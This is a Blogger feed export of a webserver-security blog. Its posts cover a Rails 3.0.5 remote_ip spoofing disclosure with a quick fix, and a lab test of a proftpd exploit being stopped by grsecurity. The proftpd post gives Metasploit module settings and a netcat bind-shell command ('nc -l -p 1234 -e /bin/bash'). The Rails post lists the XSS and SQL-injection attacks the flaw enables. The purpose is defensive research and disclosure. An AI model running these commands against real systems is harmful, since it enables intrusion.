tag:blogger.com,1999:blog-8237380801450097742024-03-20T19:24:10.378-07:00webservsecAnonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.comBlogger7125tag:blogger.com,1999:blog-823738080145009774.post-38157242195965592882015-11-10T14:12:00.000-08:002016-09-29T14:48:10.265-07:00Webserver Attack-Countermeasures - Organisational Perspective<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVved6m9or9F2FklrjuU6Rk7rbIlwhCMb54q7MPd33uaDg7LFDk4YXzX7tucdis4le-7bhOFm-S2pnJxKXY1LOfhaUoave1H6XpxYmK-U0pCaIEnuKyl9iP4iFcrEhbq4c8I7WkYLIRmP/s1600/ipep-counter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVved6m9or9F2FklrjuU6Rk7rbIlwhCMb54q7MPd33uaDg7LFDk4YXzX7tucdis4le-7bhOFm-S2pnJxKXY1LOfhaUoave1H6XpxYmK-U0pCaIEnuKyl9iP4iFcrEhbq4c8I7WkYLIRmP/s1600/ipep-counter.png" /></a></div>
Anonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.com7tag:blogger.com,1999:blog-823738080145009774.post-91600041378579687612011-04-03T04:04:00.000-07:002011-04-03T04:05:58.772-07:00Incident Response with Server- and Config-ManagementHi,<br />
i m working on finding best-practices in webserver-security (for my servers).<br />
as this is an in-dev-process, i would really appreciate some <span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; font-family: arial, helvetica, sans-serif; font-size: 13px;"><a href="http://www.dict.cc/englisch-deutsch/criticisms.html" style="color: black; text-decoration: none;">criticisms</a>, hints, ..</span>.<br />
<br />
sample-server:<br />
grsecurity (hard) patched server with active least-priv-policy (RBAC)<br />
apache with mod_rails (one user per webapp)<br />
logs external on a server with splunk<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpfA6_C2xUes1bLiYCTypX-dDZe8Mpmwdl9Qkq7m2i2jJXL2PZ7AaY7JukOWNQz90TFoZolOAvSjTb2MuR-K8bWlZhyANHalCnDhVKwaGQqWHOYt0D8i1upqoeEjO9gL_fVkaHgjHtIq9J/s1600/incident-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpfA6_C2xUes1bLiYCTypX-dDZe8Mpmwdl9Qkq7m2i2jJXL2PZ7AaY7JukOWNQz90TFoZolOAvSjTb2MuR-K8bWlZhyANHalCnDhVKwaGQqWHOYt0D8i1upqoeEjO9gL_fVkaHgjHtIq9J/s1600/incident-response.png" /></a></div>brJAnonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.com7tag:blogger.com,1999:blog-823738080145009774.post-39386331528924399762011-02-15T18:30:00.000-08:002011-04-14T03:40:57.788-07:00Ruby on Rails VulnerabilityRails 3.0.5 doesn't validate the input for the X-Forwarded-For field in the header <u>sent by clients with a class C remote-addr</u>. (see: TRUSTED_PROXIES). So this Attack could also work if there s a load-balancer infront of the mongrel- or unicorn-instances.<br />
<br />
This affects the security of internal webservers with rails-web-apps (Intranet-Servers, ...)<br />
<br />
<b>affected</b>: request.remote_ip<br />
<br />
rails/actionpack/lib/action_dispatch/middleware/remote_ip.rb method: to_s<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsDM6CFYhGVhWfvDOvOn56OuIQk_OSirndr4_Fy4DV5viAuqh9r2IzRMplarjLroWRafIlOLW1XqvfIAUzk1XNvxz_7ZhwHgNMf060SxCsrpzGsqX2SWCC4MkE6CzvzTYKt4MIR30XmRRs/s1600/rails_remoteip.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsDM6CFYhGVhWfvDOvOn56OuIQk_OSirndr4_Fy4DV5viAuqh9r2IzRMplarjLroWRafIlOLW1XqvfIAUzk1XNvxz_7ZhwHgNMf060SxCsrpzGsqX2SWCC4MkE6CzvzTYKt4MIR30XmRRs/s1600/rails_remoteip.jpg" /></a></div>rails/actionpack/lib/action_dispatch/http/request.rb<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4es6lfh0e_O2Z33sTRbD2YOILlfsf524B4zIWmIEoyfzh1JhhcpWZh4GrTeB1gs6i6MXR26jDs3eoPuI_OdfkM91q7un4sAeTpaj_EMEUuJzsnUE1LX-uYE1Vj4khhsxo5FQ_RsFGlcl6/s1600/rails_trustedproxies.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4es6lfh0e_O2Z33sTRbD2YOILlfsf524B4zIWmIEoyfzh1JhhcpWZh4GrTeB1gs6i6MXR26jDs3eoPuI_OdfkM91q7un4sAeTpaj_EMEUuJzsnUE1LX-uYE1Vj4khhsxo5FQ_RsFGlcl6/s1600/rails_trustedproxies.png" /></a></div><br />
<br />
<b><br />
</b><br />
<b>possible attacks (on intranet webapps)</b>:<br />
x ip spoofing<br />
x logfile-injection<br />
-- ipspoofing<br />
-- date back attack (hide)<br />
-- binary injection to mess with analysing-tools<br />
<br />
if request.remote_ip is used in an insecure manner<br />
- Persistent XSS<br />
- SQL-Injection (if request.remote_ip is used in an insecure sql-query)<br />
...<br />
(i would have trusted request.remote_ip)<br />
<br />
<b>quick-fix</b>:<br />
check if "request.remote_ip" is really an ip-address before you use it<br />
<br />
<b>proof-of-concept</b>:<br />
1.<br />
<span class="Apple-style-span" style="font-size: large;"><a href="https://gist.github.com/868268">https://gist.github.com/868268</a></span><br />
<br />
2.<br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Screencast shows you a POC with tamperdata.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Persistent XSS with Devise, IP-Spoofing, ...</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><a href="http://www.screencast.com/users/banditj/folders/Jing/media/9025e6c3-a0fd-46d8-b1ef-ce2b01751f7c"><span class="Apple-style-span" style="font-size: large;">http://www.screencast.com/users/banditj/folders/Jing/media/9025e6c3-a0fd-46d8-b1ef-ce2b01751f7c</span></a></div><br />
<br />
you can leave anonymous comments<br />
<br />
<a href="http://www.jimmybandit.com/">http://www.jimmybandit.com</a>Anonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.com31tag:blogger.com,1999:blog-823738080145009774.post-64854957862616402252011-01-31T15:06:00.000-08:002011-01-31T15:06:34.357-08:00grsecurity vs proftpd-exploitVictim: Debian 6.0 with proftpd 1.3.3a<br />
Attacker: Backtrack 4 rc2 - Metasploit 3.6<br />
<br />
use exploit/linux/ftp/proftp_telnet_iac<br />
set TARGET 2<br />
set PAYLOAD ...<br />
<br />
The Shell-payloads of metapsloit didnt work but i could execute a command<br />
--> nc -l -p 1234 -e /bin/bash<br />
which listens on port 1234 and gives you a bash shell on connect<br />
<div><br />
</div><div>system got compromised. so now with grsecurity</div><div>i used the tutorial from <a href="http://xorl.wordpress.com/2009/02/02/how-to-grsec-debian-262710-grsec/">http://xorl.wordpress.com/2009/02/02/how-to-grsec-debian-262710-grsec/</a></div><div>to patch the latest kernel in this case</div><div>Linux debian 2.6.32.28</div><div><br />
</div><div>at compilation i got an error, something with "lguest"</div><div>found a workaround (easy) at</div><div><a href="http://masetio.web.id/2010/03/compile-kernel-error-lguest-c3718-error-zlib-h-no-such-file-or-directory/">http://masetio.web.id/2010/03/compile-kernel-error-lguest-c3718-error-zlib-h-no-such-file-or-directory/</a></div><div><br />
</div><div>i tried again to exploit proftpd and it didnt work.</div><div><b>pax did alarm me and shutdown proftpd</b></div><div><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO8UzQzzvsKZAv1YTUafichpMnuYVnF_9_odn_6wn29Sb_78Gpm9EJTXHWan6I8NM4P2a7ZA3XJljr29zoEBSAKc5sP6rWOXoCpTdYwXOO0UI1TNOv466QN2x93XfE9YJ3vEoJw3Ta3Ur_/s1600/grsecurity.vs.proftpd-exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO8UzQzzvsKZAv1YTUafichpMnuYVnF_9_odn_6wn29Sb_78Gpm9EJTXHWan6I8NM4P2a7ZA3XJljr29zoEBSAKc5sP6rWOXoCpTdYwXOO0UI1TNOv466QN2x93XfE9YJ3vEoJw3Ta3Ur_/s1600/grsecurity.vs.proftpd-exploit.png" /></a></div><div><br />
</div><div class="separator" style="clear: both; text-align: center;">HERE is the VIDEO</div><div class="separator" style="clear: both; text-align: center;"><a href="http://www.jimmybandit.com/grsecurity.vs.proftpd.swf">http://www.jimmybandit.com/grsecurity.vs.proftpd.swf</a></div><div><br />
</div>Anonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.com14tag:blogger.com,1999:blog-823738080145009774.post-65526161859811098892010-11-10T00:49:00.001-08:002010-11-10T14:18:49.794-08:00Webserver Attack-Flow<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAYeDukWUPMomy-cPgMIrT4LlBJ9ZAInIhsF75yVGh6Q553IdvP4ko-enL-rabWqPgfQCIDy-u8d1cUe_4YJWzaGJNwrs02QaQEa31iAeqFyY8T_tuPoVveB63BsXNYzuqowu7UmUk8zPE/s1600/attack-flussdiagramm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAYeDukWUPMomy-cPgMIrT4LlBJ9ZAInIhsF75yVGh6Q553IdvP4ko-enL-rabWqPgfQCIDy-u8d1cUe_4YJWzaGJNwrs02QaQEa31iAeqFyY8T_tuPoVveB63BsXNYzuqowu7UmUk8zPE/s1600/attack-flussdiagramm.png" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div>Anonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.com10tag:blogger.com,1999:blog-823738080145009774.post-26668797295698117562010-10-06T02:22:00.000-07:002010-10-06T02:56:46.388-07:00Threats<div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM7dtlpoUgXZ11NiqdK_r7GFT5box-YPTuQjAASFCIXDPHEzKRhSwIrXyhMjUT3IBHW9MmlZDU8n9CJgsOrMJSd_Q8fmtduJTZjqb6uBHSjq9vG72pydBrRh8GjQnVS65VceTLi-J5G0Qf/s1600/web-vulns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM7dtlpoUgXZ11NiqdK_r7GFT5box-YPTuQjAASFCIXDPHEzKRhSwIrXyhMjUT3IBHW9MmlZDU8n9CJgsOrMJSd_Q8fmtduJTZjqb6uBHSjq9vG72pydBrRh8GjQnVS65VceTLi-J5G0Qf/s1600/web-vulns.png" /></a></div><br />
</div>Anonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.com8tag:blogger.com,1999:blog-823738080145009774.post-40555224960531928112010-10-05T02:55:00.000-07:002011-10-02T13:33:34.217-07:00Countermeasuresimage removed - hire me :-)<div class="separator" style="clear: both; text-align: center;">
</div>
Anonymoushttp://www.blogger.com/profile/11255374644167283978noreply@blogger.com8